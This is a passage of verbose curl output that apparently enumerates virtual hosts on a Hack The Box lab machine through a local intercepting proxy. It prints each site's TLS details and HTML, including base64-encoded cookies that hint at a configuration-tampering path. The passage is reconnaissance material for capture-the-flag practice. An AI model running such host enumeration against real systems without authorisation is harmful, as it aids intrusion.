  2033. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2034. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2035. *   Trying 127.0.0.1...
  2036. * TCP_NODELAY set
  2037. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2038. * allocate connect buffer!
  2039. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2040. > CONNECT 10.10.10.144:443 HTTP/1.1
  2041. > Host: 10.10.10.144:443
  2042. > User-Agent: curl/7.61.0
  2043. > Proxy-Connection: Keep-Alive
  2044. >
  2045. < HTTP/1.0 200 Connection established
  2046. <
  2047. * Proxy replied 200 to CONNECT request
  2048. * CONNECT phase completed!
  2049. * ALPN, offering h2
  2050. * ALPN, offering http/1.1
  2051. * successfully set certificate verify locations:
  2052. *   CAfile: none
  2053.   CApath: /etc/ssl/certs
  2054. * (304) (OUT), TLS handshake, Client hello (1):
  2055. * CONNECT phase completed!
  2056. * CONNECT phase completed!
  2057. * (304) (IN), TLS handshake, Server hello (2):
  2058. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2059. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2060. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2061. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2062. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2063. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2064. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2065. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2066. * ALPN, server did not agree to a protocol
  2067. * Server certificate:
  2068. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2069. *  start date: Jan 21 17:26:12 2014 GMT
  2070. *  expire date: Jan 21 17:26:12 2038 GMT
  2071. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2072. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2073. > GET / HTTP/1.1
  2074. > Host: flowerzrus.htb
  2075. > User-Agent: curl/7.61.0
  2076. > Accept: */*
  2077. >
  2078. < HTTP/1.1 200 OK
  2079. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2080. < Content-Type: text/html; charset=UTF-8
  2081. < Connection: close
  2082. < Server: ClownWare Proxy
  2083. < Content-Length: 3480
  2084. <
  2085. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2086. <html xmlns="http://www.w3.org/1999/xhtml">
  2087. <head>
  2088. <title>Floral Design</title>
  2089. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  2090. <link href="css/styles.css" rel="stylesheet" type="text/css" />
  2091. </head>
  2092. <body>
  2093. <div id="container">
  2094.   <div id="topLine"></div>
  2095.   <div id="logoPan"> <img src="images/logo.gif" width="192" height="92" alt="" id="logo" /> <img src="images/slogan.gif" width="297" height="46" alt="" id="slogan" /> </div>
  2096.   <div id="menuPan">
  2097.     <ul class="menu">
  2098.       <li class="btn_1"><a href="#">home page</a></li>
  2099.       <li class="line"></li>
  2100.       <li class="btn_2"><a href="#">about us</a></li>
  2101.       <li class="line"></li>
  2102.       <li class="btn_3"><a href="#">bouquets</a></li>
  2103.       <li class="line"></li>
  2104.       <li class="btn_4"><a href="#">specials</a></li>
  2105.       <li class="line"></li>
  2106.       <li class="btn_5"><a href="#">contacts</a></li>
  2107.     </ul>
  2108.   </div>
  2109.   <div id="header"> <img src="images/slogan2.gif" width="192" height="70" alt="" id="slogan2" /></div>
  2110.   <div id="content">
  2111.     <div id="leftPan">
  2112.       <div id="welcome">
  2113.         <h2></h2>
  2114.         <img src="images/img_welcome.jpg" width="172" height="56" alt="" />
  2115.         <p class="headline">Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc. </p>
  2116.         <p>Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc. In volutpat sodales ipsum. Sed vestibulum. Integer in ante. Sed Nunc laoreet lacinia nunc. In volutpat sodales </p>
  2117.       </div>
  2118.     </div>
  2119.     <div id="rightPan">
  2120.       <div id="featured">
  2121.         <h2></h2>
  2122.         <p class="headline">Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc.Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc. In volutpat sodales ipsum. </p>
  2123.         <div class="featItem" id="i01"> <img src="images/img_prod.jpg" width="116" height="125" alt="" />
  2124.           <p><span class="headline2">Morbi volutpat leo in</span><br />
  2125.             <a href="#">Nam eu nulla. Donec</a><br />
  2126.             lobortis purus vel urna. Nunc laoreet lacinia nunc</p>
  2127.         </div>
  2128.         <div class="featItem" id="i02"> <img src="images/img_prod-13.jpg" width="116" height="125" alt="" />
  2129.           <p><span class="headline2">Morbi volutpat leo in</span><br />
  2130.             <a href="#">Nam eu nulla. Donec</a><br />
  2131.             lobortis purus vel urna. Nunc laoreet lacinia nunc</p>
  2132.         </div>
  2133.         <div class="featItem" id="i03"> <img src="images/img_prod-14.jpg" width="116" height="125" alt="" />
  2134.           <p><span class="headline2">Morbi volutpat leo in</span><br />
  2135.             <a href="#">Nam eu nulla. Donec</a><br />
  2136.             lobortis purus vel urna. Nunc laoreet lacinia nunc</p>
  2137.         </div>
  2138.         <div class="clear"></div>
  2139.       </div>
  2140.     </div>
  2141.     <div class="clear" id="end"></div>
  2142.   </div>
  2143. </div>
  2144. <div id="footer">
  2145.   <p><a href="#">HOME PAGE</a> | <a href="#">ABOUT US</a> | <a href="#">BOUTQUETS</a> | <a href="#">SPECIALS</a> | <a href="#">NEWS</a> | <a href="#">CONTACTS</a><br/>
  2146.     Copyright &copy; Your Company Name | Design by <a href="http://freshtemplates.com/">Website Templates</a></p>
  2147. </div>
  2148. <div align=center>This template  downloaded form <a href='http://all-free-download.com/free-website-templates/'>free website templates</a></div></body>
  2149. </html>
  2150. * Closing connection 0
  2151. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2152.  
  2153.  
  2154. chocolateriver.htb
  2155. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2156. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2157. *   Trying 127.0.0.1...
  2158. * TCP_NODELAY set
  2159. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2160. * allocate connect buffer!
  2161. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2162. > CONNECT 10.10.10.144:443 HTTP/1.1
  2163. > Host: 10.10.10.144:443
  2164. > User-Agent: curl/7.61.0
  2165. > Proxy-Connection: Keep-Alive
  2166. >
  2167. < HTTP/1.0 200 Connection established
  2168. <
  2169. * Proxy replied 200 to CONNECT request
  2170. * CONNECT phase completed!
  2171. * ALPN, offering h2
  2172. * ALPN, offering http/1.1
  2173. * successfully set certificate verify locations:
  2174. *   CAfile: none
  2175.   CApath: /etc/ssl/certs
  2176. * (304) (OUT), TLS handshake, Client hello (1):
  2177. * CONNECT phase completed!
  2178. * CONNECT phase completed!
  2179. * (304) (IN), TLS handshake, Server hello (2):
  2180. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2181. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2182. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2183. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2184. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2185. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2186. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2187. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2188. * ALPN, server did not agree to a protocol
  2189. * Server certificate:
  2190. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2191. *  start date: Jan 21 17:26:12 2014 GMT
  2192. *  expire date: Jan 21 17:26:12 2038 GMT
  2193. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2194. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2195. > GET / HTTP/1.1
  2196. > Host: chocolateriver.htb
  2197. > User-Agent: curl/7.61.0
  2198. > Accept: */*
  2199. >
  2200. < HTTP/1.1 200 OK
  2201. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2202. < Content-Type: text/html; charset=UTF-8
  2203. < Connection: close
  2204. < Server: ClownWare Proxy
  2205. < Content-Length: 491
  2206. <
  2207. <!DOCTYPE html>
  2208. <html>
  2209.     <head>
  2210.         <style type="text/css">
  2211.             body {
  2212.                 background-color: #000;
  2213.             }
  2214.             img {
  2215.             width: 100%;
  2216.             height: auto;
  2217.         }
  2218.         </style>
  2219.     </head>
  2220.     <body>
  2221.         <center>
  2222.             <video width=100% controls>
  2223.               <source src="chocoriver.mp4" type="video/mp4">
  2224.               Your browser does not support HTML5 video.
  2225.             </video>
  2226.         </center>
  2227.     </body>
  2228. * Closing connection 0
  2229. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2230. </html>
  2231.  
  2232. meetspinz.htb
  2233. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2234. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2235. *   Trying 127.0.0.1...
  2236. * TCP_NODELAY set
  2237. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2238. * allocate connect buffer!
  2239. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2240. > CONNECT 10.10.10.144:443 HTTP/1.1
  2241. > Host: 10.10.10.144:443
  2242. > User-Agent: curl/7.61.0
  2243. > Proxy-Connection: Keep-Alive
  2244. >
  2245. < HTTP/1.0 200 Connection established
  2246. <
  2247. * Proxy replied 200 to CONNECT request
  2248. * CONNECT phase completed!
  2249. * ALPN, offering h2
  2250. * ALPN, offering http/1.1
  2251. * successfully set certificate verify locations:
  2252. *   CAfile: none
  2253.   CApath: /etc/ssl/certs
  2254. * (304) (OUT), TLS handshake, Client hello (1):
  2255. * CONNECT phase completed!
  2256. * CONNECT phase completed!
  2257. * (304) (IN), TLS handshake, Server hello (2):
  2258. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2259. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2260. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2261. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2262. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2263. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2264. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2265. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2266. * ALPN, server did not agree to a protocol
  2267. * Server certificate:
  2268. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2269. *  start date: Jan 21 17:26:12 2014 GMT
  2270. *  expire date: Jan 21 17:26:12 2038 GMT
  2271. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2272. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2273. > GET / HTTP/1.1
  2274. > Host: meetspinz.htb
  2275. > User-Agent: curl/7.61.0
  2276. > Accept: */*
  2277. >
  2278. < HTTP/1.1 200 OK
  2279. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2280. < Content-Type: text/html; charset=UTF-8
  2281. < Connection: close
  2282. < Server: ClownWare Proxy
  2283. < Content-Length: 522
  2284. <
  2285. <!DOCTYPE html>
  2286. <html>
  2287.     <head>
  2288.         <title>Spin The Meats!</title>
  2289.         <embed src="/bonus.webm" volume="100" height="0" width="0" autostart="true" loop="true"  width="0" height="0">
  2290.     </head>
  2291.         <style type="text/css">
  2292.             body {
  2293.                 background-color: #000;
  2294.             }
  2295.             img {
  2296.             width: 100%;
  2297.             height: auto;
  2298.         }
  2299.         </style>
  2300.     </head>
  2301.     <body>
  2302.         <center>
  2303.             <img src="/meatspin.gif"/>
  2304.  
  2305.         </center>
  2306.     </body>
  2307. * Closing connection 0
  2308. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2309. </html>
  2310.  
  2311. rubberlove.htb
  2312. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2313. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2314. *   Trying 127.0.0.1...
  2315. * TCP_NODELAY set
  2316. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2317. * allocate connect buffer!
  2318. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2319. > CONNECT 10.10.10.144:443 HTTP/1.1
  2320. > Host: 10.10.10.144:443
  2321. > User-Agent: curl/7.61.0
  2322. > Proxy-Connection: Keep-Alive
  2323. >
  2324. < HTTP/1.0 200 Connection established
  2325. <
  2326. * Proxy replied 200 to CONNECT request
  2327. * CONNECT phase completed!
  2328. * ALPN, offering h2
  2329. * ALPN, offering http/1.1
  2330. * successfully set certificate verify locations:
  2331. *   CAfile: none
  2332.   CApath: /etc/ssl/certs
  2333. * (304) (OUT), TLS handshake, Client hello (1):
  2334. * CONNECT phase completed!
  2335. * CONNECT phase completed!
  2336. * (304) (IN), TLS handshake, Server hello (2):
  2337. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2338. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2339. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2340. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2341. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2342. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2343. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2344. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2345. * ALPN, server did not agree to a protocol
  2346. * Server certificate:
  2347. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2348. *  start date: Jan 21 17:26:12 2014 GMT
  2349. *  expire date: Jan 21 17:26:12 2038 GMT
  2350. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2351. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2352. > GET / HTTP/1.1
  2353. > Host: rubberlove.htb
  2354. > User-Agent: curl/7.61.0
  2355. > Accept: */*
  2356. >
  2357. < HTTP/1.1 200 OK
  2358. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2359. < Content-Type: text/html; charset=UTF-8
  2360. < Connection: close
  2361. < Server: ClownWare Proxy
  2362. < Content-Length: 492
  2363. <
  2364. <!DOCTYPE html>
  2365. <html>
  2366.     <head>
  2367.         <style type="text/css">
  2368.             body {
  2369.                 background-color: #000;
  2370.             }
  2371.             img {
  2372.             width: 100%;
  2373.             height: auto;
  2374.         }
  2375.         </style>
  2376.     </head>
  2377.     <body>
  2378.         <center>
  2379.             <video width=60% controls>
  2380.               <source src="rubberlove.webm" type="video/webm">
  2381.               Your browser does not support HTML5 video.
  2382.             </video>
  2383.         </center>
  2384.     </body>
  2385. * Closing connection 0
  2386. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2387. </html>
  2388.  
  2389. freeflujab.htb
  2390. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2391. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2392. *   Trying 127.0.0.1...
  2393. * TCP_NODELAY set
  2394. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2395. * allocate connect buffer!
  2396. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2397. > CONNECT 10.10.10.144:443 HTTP/1.1
  2398. > Host: 10.10.10.144:443
  2399. > User-Agent: curl/7.61.0
  2400. > Proxy-Connection: Keep-Alive
  2401. >
  2402. < HTTP/1.0 200 Connection established
  2403. <
  2404. * Proxy replied 200 to CONNECT request
  2405. * CONNECT phase completed!
  2406. * ALPN, offering h2
  2407. * ALPN, offering http/1.1
  2408. * successfully set certificate verify locations:
  2409. *   CAfile: none
  2410.   CApath: /etc/ssl/certs
  2411. * (304) (OUT), TLS handshake, Client hello (1):
  2412. * CONNECT phase completed!
  2413. * CONNECT phase completed!
  2414. * (304) (IN), TLS handshake, Server hello (2):
  2415. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2416. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2417. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2418. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2419. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2420. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2421. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2422. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2423. * ALPN, server did not agree to a protocol
  2424. * Server certificate:
  2425. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2426. *  start date: Jan 21 17:26:12 2014 GMT
  2427. *  expire date: Jan 21 17:26:12 2038 GMT
  2428. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2429. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2430. > GET / HTTP/1.1
  2431. > Host: freeflujab.htb
  2432. > User-Agent: curl/7.61.0
  2433. > Accept: */*
  2434. >
  2435. < HTTP/1.1 200 OK
  2436. < Date: Thu, 20 Dec 2018 00:41:12 GMT
  2437. < Content-Type: text/html; charset=UTF-8
  2438. < Connection: close
  2439. < Set-Cookie: Modus=Q29uZmlndXJlPU51bGw%3D; expires=Thu, 20-Dec-2018 01:41:12 GMT; Max-Age=3600; path=/?smtp_config
  2440. < Set-Cookie: Patient=4f6c00295ca97dc7357d7384584a92f4; expires=Thu, 20-Dec-2018 01:41:12 GMT; Max-Age=3600; path=/
  2441. < Set-Cookie: Registered=NGY2YzAwMjk1Y2E5N2RjNzM1N2Q3Mzg0NTg0YTkyZjQ9TnVsbA%3D%3D; expires=Thu, 20-Dec-2018 01:41:12 GMT; Max-Age=3600; path=/
  2442. < Server: ClownWare Proxy
  2443. < Content-Length: 8867
  2444. <
  2445. <!DOCTYPE HTML>
  2446. <html>
  2447.     <head>
  2448.         <title>Vaccinations</title>
  2449.         <meta charset="utf-8" />
  2450.         <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"/>
  2451.         <link rel="stylesheet" href="assets/css/main.css"/>
  2452.     </head>
  2453.     <body class="homepage is-preload">
  2454.         <div id="page-wrapper">
  2455.  
  2456.             <!-- Header -->
  2457.                 <section id="header" class="wrapper style3">
  2458.  
  2459.                     <!-- Logo -->
  2460.                         <div id="logo">
  2461.                             <h1><a href="/?stats">Winter Is Coming...</a></h1>
  2462.                         </br>
  2463.                             <h1>Book Your Free NHS Flu Jab Today!</h1>
  2464.                         </div>
  2465.  
  2466.                     <!-- Nav -->
  2467.                         <nav id="nav">
  2468.                             <ul>
  2469.                                 <li class="current"><a href="?home">Home</a></li>
  2470.                                 <li>
  2471.                                     <a href="#">Patients</a>
  2472.                                     <ul>
  2473.                                         <li><a href="?reg">Register</a></li>
  2474.                                         <li><a href="?book">Booking</a></li>
  2475.                                         <li><a href="?cancel">Cancelation</a></li>
  2476.                                         <li><a href="?remind">Reminder</a></li>
  2477.                                         </li>
  2478.                                     </ul>
  2479.                                 </li>
  2480.                                 <li><a href="/?info">Vaccine Info</a></li>
  2481.                                 <li><a href="/?stats">Flu Stats</a></li>
  2482.                             </ul>
  2483.                         </nav>
  2484.  
  2485.                 </section><!-- Scripts -->
  2486.     <script src="assets/js/jquery.min.js"></script>
  2487.     <script src="assets/js/jquery.dropotron.min.js"></script>
  2488.     <script src="assets/js/browser.min.js"></script>
  2489.     <script src="assets/js/breakpoints.min.js"></script>
  2490.     <script src="assets/js/util.js"></script>
  2491.     <script src="assets/js/main.js"></script><!-- Main -->
  2492.                 <section id="main" class="wrapper style1">
  2493.                     <div class="title">Vaccinations</div>
  2494.                     <div class="container">
  2495.                         <!-- <div class="row gtr-150"> -->
  2496.                             <div class="col-8 col-12-medium">
  2497.  
  2498.                                 <!-- Content -->
  2499.                                     <div id="content">
  2500.                                         <article class="box post">
  2501.                                             <header class="style1">
  2502.                                                 <h2>Getting The Flu Jab</h2>
  2503.                                                 <h3>Flu vaccination is available every year on the NHS to help protect adults and children at risk of flu and its complications.</h3>
  2504.                                             </header>
  2505.                                             <a href="?book" class="image featured">
  2506.                                                 <img src="images/pic01.jpg" alt="" />
  2507.                                             </a>
  2508.                                             <h2>The flu vaccine</h2>
  2509.                                             <p>Flu can be unpleasant, but if you are otherwise healthy it will usually clear up on its own within a week.
  2510.  
  2511.                                             However, flu can be more severe in certain people, such as:
  2512.                                             <ul>
  2513.                                                 <li>anyone aged 65 and over</li>
  2514.                                                 <li>pregnant women</li>
  2515.                                                 <li>children and adults with an underlying health condition (such as long-term heart or respiratory disease)</li>
  2516.                                                 <li>children and adults with weakened immune systems</li>
  2517.                                             </ul>
  2518.                                             Anyone in these risk groups is more likely to develop potentially serious complications of flu, such as pneumonia (a lung infection), so it is now recommended that they have a flu vaccine every year to help protect them.</p>
  2519.                                             <h2>Who should get the flu vaccine?</h2>
  2520.                                             <p>The flu vaccine is routinely given on the NHS to:
  2521.                                             <ul>
  2522.                                                 <li>adults 65 and over</li>
  2523.                                                 <li>people with certain medical conditions (including children in at-risk groups from 6 months of age)</li>
  2524.                                                 <li>pregnant women</li>
  2525.                                                 <li>children aged 2 and 3</li>
  2526.                                                 <li>children in reception class and school years 1, 2, 3, 4 and 5</li>
  2527.                                             </ul>
  2528.                                         <h3>For 2018, there are 3 types of flu vaccine:</h3>
  2529.                                             <p>1. a live quadrivalent vaccine (which protects against 4 strains of flu), given as a nasal spray. This is for children and young people aged 2 to 17 years eligible for the flu vaccine</p>
  2530.                                             <p>2. a quadrivalent injected vaccine. This is for adults aged 18 and over but below the age of 65 who are at increased risk from flu because of a long-term health condition and for children 6 months and above in an eligible group who cannot receive the live vaccine</p>
  2531.                                             <p>3. an adjuvanted trivalent injected vaccine. This is for people aged 65 and over as it has been shown to be more effective in this age group</p>
  2532.                                         </article>
  2533.                                         <div class="row gtr-150">
  2534.                                             <div class="col-6 col-12-small">
  2535.                                                 <section class="box">
  2536.                                                     <header>
  2537.                                                         <h2>Young Children</h2>
  2538.                                                     </header>
  2539.                                                     <a href="#" class="image featured"><img src="images/pic05.jpg" alt="" /></a>
  2540.                                                     <p>If your child is aged between 6 months and 2 years old and is in a high-risk group for flu, they will be offered an injected flu vaccine as the nasal spray is not licensed for children under 2.</p>
  2541.                                                     <a href="/?info" class="button style1">More</a>
  2542.                                                 </section>
  2543.                                             </div>
  2544.                                             <div class="col-6 col-12-small">
  2545.                                                 <section class="box">
  2546.                                                     <header>
  2547.                                                         <h2>How effective is the flu vaccine?</h2>
  2548.                                                     </header>
  2549.                                                     <a href="#" class="image featured"><img src="images/pic06.jpg" alt="" /></a>
  2550.                                                     <p>Flu vaccine is the best protection we have against an unpredictable virus that can cause unpleasant illness in children and severe illness and death among at-risk groups, including older people, pregnant women and those with an underlying medical health condition.</p>
  2551.                                                     <a href="/?stats" class="button style1">More</a>
  2552.                                                 </section>
  2553.                                             </div>
  2554.                                         </div>
  2555.                                     </div>
  2556.  
  2557.                             </div>
  2558.                         </div>
  2559.                     </div>
  2560.                 </section>
  2561.       </section>
  2562.       <!-- Footer -->
  2563.         <section id="footer" class="wrapper">
  2564.           <div class="container">
  2565.             <div id="copyright">
  2566.               <ul>
  2567.                 <li>&copy; 3mrgnc3</li>
  2568.                 <li> <a href="http://freeflujab.htb">FreeFluJab.htb</a></li>
  2569.                 <li><b><a href="https://clownware.htb/link.php">Protected By ClownWare.htb</a></b></li>
  2570.               </ul>
  2571.             </div>  
  2572.         </section>
  2573.     </div>
  2574.   </body>
  2575. </html>
  2576.  
  2577. <!--
  2578. We're all sorry for the other guy when he loses his job to a machine.
  2579. But when it comes to your job -- that's different.  And it always will
  2580. be different.
  2581.         -- McCoy, "The Ultimate Computer", stardate 4729.4
  2582.  
  2583. -->
  2584.  
  2585. * Closing connection 0
  2586. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2587.  
  2588.  
  2589. flujab.htb
  2590. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2591. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2592. *   Trying 127.0.0.1...
  2593. * TCP_NODELAY set
  2594. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2595. * allocate connect buffer!
  2596. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2597. > CONNECT 10.10.10.144:443 HTTP/1.1
  2598. > Host: 10.10.10.144:443
  2599. > User-Agent: curl/7.61.0
  2600. > Proxy-Connection: Keep-Alive
  2601. >
  2602. < HTTP/1.0 200 Connection established
  2603. <
  2604. * Proxy replied 200 to CONNECT request
  2605. * CONNECT phase completed!
  2606. * ALPN, offering h2
  2607. * ALPN, offering http/1.1
  2608. * successfully set certificate verify locations:
  2609. *   CAfile: none
  2610.   CApath: /etc/ssl/certs
  2611. * (304) (OUT), TLS handshake, Client hello (1):
  2612. * CONNECT phase completed!
  2613. * CONNECT phase completed!
  2614. * (304) (IN), TLS handshake, Server hello (2):
  2615. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2616. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2617. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2618. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2619. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2620. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2621. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2622. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2623. * ALPN, server did not agree to a protocol
  2624. * Server certificate:
  2625. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2626. *  start date: Jan 21 17:26:12 2014 GMT
  2627. *  expire date: Jan 21 17:26:12 2038 GMT
  2628. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2629. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2630. > GET / HTTP/1.1
  2631. > Host: flujab.htb
  2632. > User-Agent: curl/7.61.0
  2633. > Accept: */*
  2634. >
  2635. < HTTP/1.1 200 OK
  2636. < Date: Thu, 20 Dec 2018 00:41:12 GMT
  2637. < Content-Type: text/html; charset=UTF-8
  2638. < Connection: close
  2639. < Server: ClownWare Proxy
  2640. < Content-Length: 3475
  2641. <
  2642. <!DOCTYPE html>
  2643. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  2644. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  2645. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  2646. <!--[if gt IE 8]><!-->
  2647. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  2648. <title>Direct IP access not allowed | ClownWare</title>
  2649. <meta charset="UTF-8">
  2650. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  2651. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  2652. <meta name="robots" content="noindex, nofollow">
  2653. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  2654. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  2655. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  2656. <style type="text/css">body{margin:0;padding:0}</style>
  2657.  
  2658.  
  2659. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  2660. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  2661.  
  2662.  
  2663.  
  2664. </head>
  2665. <body>
  2666.   <div id="cf-wrapper">
  2667.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  2668.     <div id="cf-error-details" class="cf-error-details-wrapper">
  2669.       <div class="cf-wrapper cf-header cf-error-overview">
  2670.         <h1>
  2671.           <span class="cf-error-type" data-translate="error">Error</span>
  2672.           <span class="cf-error-code">1003</span>
  2673.           <small class="heading-ray-id">Ray ID: f6d85b7d56758e4e
  2674.  • 2018-12-20 00:41:12 GMT
  2675. </small>
  2676.         </h1>
  2677.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  2678.       </div><!-- /.header -->
  2679.  
  2680.       <section></section><!-- spacer -->
  2681.  
  2682.       <div class="cf-section cf-wrapper">
  2683.         <div class="cf-columns two">
  2684.           <div class="cf-column">
  2685.             <h2 data-translate="what_happened">What happened?</h2>
  2686.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
